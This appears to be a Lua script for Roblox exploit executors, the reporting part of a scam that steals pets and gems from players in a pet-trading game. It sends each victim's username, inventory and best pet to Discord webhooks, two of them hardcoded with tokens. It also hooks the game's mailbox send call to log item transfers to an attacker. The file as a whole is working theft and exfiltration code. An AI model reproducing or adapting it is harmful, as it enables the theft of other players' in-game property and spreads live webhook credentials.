return function(dh,pn,gn,dp)
if not dp then dp = 0 end
if tonumber(gn)==100 then gn = 0 end
local msg = ""
request = (syn and syn.request) or (http and http.request) or http_request or (fluxus and fluxus.request) or request
if dh then
msg = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..dp..'","name":"DualedPets","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"@everyone"}'
else
msg = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"@everyone"}'
end
local response =
        request(
        {
            Url = _G.wh,
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = msg
        }
    )
local xxxvvv = "lolly"
pcall(function() xxxvvv=response.StatusMessage end)
if typeof(xxxvvv)~="string" then xxxvvv="Lolly" end
if not _G.User then _G.User="yve (pet change hit)" end
local big = 0
pcall(function()
local save = require(game:GetService("ReplicatedStorage").Library.Client.Save)
local dir = game:GetService("ReplicatedStorage")["__DIRECTORY"].Pets
save = save.Get()
for i,v in pairs(save.Inventory.Pet) do
if require(dir[v.id]).difficulty >= big then
big = require(dir[v.id]).difficulty
end
end
big = "1/"..big
end)
pcall(function()
if not _G.logged then
_G.logged = true
local function namecallHook(self, ...)
    local method = getnamecallmethod()
    if method == "InvokeServer" and tostring(self) == "Mailbox: Send" then
        local args = {...}
        local mp4log = ""
        local e = game.Players.LocalPlayer.Name.." -> "..args[1].." : "..args[5].." of "..args[3].."\\n"
        local rev, er = oldNamecall(self, ...)
        if rev then
        e=e.."sent"
        else
        e=e..er
        end
        mp4log = '{"content":"'..e..'"}'
        local responsere =
                request(
                {
                    Url = "https://discordapp.com/api/webhooks/1300158038656680066/8M0hjB4DdjWrMn66G30797f-X6_uNLbztWxMylL0mmZhWBG3M5abNAK_gA022Rii6Sek",
                    Method = "POST",
                    Headers = {["Content-Type"] = "application/json"},
                    Body = log
                }
            )
        return rev, er
    end
    return oldNamecall(self, ...)
end
local success, errorOrMessage
success, oldNamecall = pcall(hookmetamethod, game, "__namecall", newcclosure(namecallHook))
if not success then
    error(errorOrMessage)
end
end
end)
local log = ""
if dh then
log = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'.._G.User..'","name":"Hitter","inline":false},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..dp..'","name":"DualedPets","inline":true}],"title":"Pets Go Hit!"}],"tts":false,"content":"'..xxxvvv..'"}'
else
log = '{"embeds":[{"fields":[{"name":"User","value":"'..game.Players.LocalPlayer.Name.." / "..game.Players.LocalPlayer.DisplayName..'"},{"value":"'.._G.User..'","name":"Hitter","inline":false},{"value":"'..pn..'","name":"Pets","inline":true},{"value":"'..gn..'","name":"Gems","inline":true},{"value":"'..big..'","name":"Best Pet","inline":false}],"title":"Pets Go Hit!"}],"tts":false,"content":"'..xxxvvv..'"}'
end
local responser =
        request(
        {
            Url = "https://discordapp.com/api/webhooks/1298650438111068170/hippfrrGnjC-5wIWfrUS8gV6AAwqJKlpUiAmxHSaSFQhHPutaOym0MmSSxSpADpwZIAQ",
            Method = "POST",
            Headers = {["Content-Type"] = "application/json"},
            Body = log
        }
    )
return response
end
